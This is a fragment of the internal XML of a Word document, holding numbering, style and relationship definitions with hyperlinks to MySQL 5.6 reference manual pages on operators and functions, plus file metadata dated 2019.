  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="13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405BD"/>
    <w:rsid w:val="002A05A2"/>
    <w:rsid w:val="002E2BBC"/>
    <w:rsid w:val="002F3109"/>
    <w:rsid w:val="00914E2D"/>
    <w:rsid w:val="00C91532"/>
    <w:rsid w:val="044440C8"/>
    <w:rsid w:val="0D983FD7"/>
    <w:rsid w:val="182F6707"/>
    <w:rsid w:val="206B17A9"/>
    <w:rsid w:val="21916007"/>
    <w:rsid w:val="27E9390F"/>
    <w:rsid w:val="39A31352"/>
    <w:rsid w:val="39D04478"/>
    <w:rsid w:val="42615F51"/>
    <w:rsid w:val="4F284F5D"/>
    <w:rsid w:val="53924582"/>
    <w:rsid w:val="55417028"/>
    <w:rsid w:val="5A882896"/>
    <w:rsid w:val="625B57CE"/>
    <w:rsid w:val="6EEF36EB"/>
    <w:rsid w:val="7374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  <w:rPr>
      <w:szCs w:val="2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header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char"/>
    <w:rsid w:val="002A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A05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A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A05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2A05A2"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char1">
    <w:name w:val="批注框文本 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a7"/>
    <w:rsid w:val="002A05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  <w:rPr>
      <w:szCs w:val="20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header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char"/>
    <w:rsid w:val="002A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A05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2A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2A05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2A05A2"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char1">
    <w:name w:val="批注框文本 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a7"/>
    <w:rsid w:val="002A05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.mysql.com/doc/refman/5.6/en/assignment-operators.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/bit-functions.html" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/string-comparison-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v.mysql.com/doc/refman/5.6/en/arithmetic-functions.html" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/string-comparison-functions.html" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/logical-operators.html" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/string-functions.html" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/logical-operator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ev.mysql.com/doc/refman/5.6/en/assignment-operators.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/bit-functions.html" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/regex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.mysql.com/doc/refman/5.6/en/bit-functions.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/control-flow-functions.html" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6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.mysql.com/doc/refman/5.6/en/logical-operators.html" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/regexp.html" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/bit-function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.mysql.com/doc/refman/5.6/en/cast-functions.html" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/arithmetic-functions.html" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/arithmetic-functions.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.jpeg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/bit-functions.html" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/bit-functions.html" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/regexp.html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dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/arithmetic-functions.html" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/arithmetic-functions.html" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/arithmetic-functions.html" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.6/en/arithmetic-functions.html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3663</Words>
  <Characters>20885</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>174</Lines>
  <Paragraphs>48</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company> </Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>24500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夏目ING  °</dc:creator>
  <cp:lastModifiedBy>Lemonguo</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-07-04T04:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-04T04:55:00Z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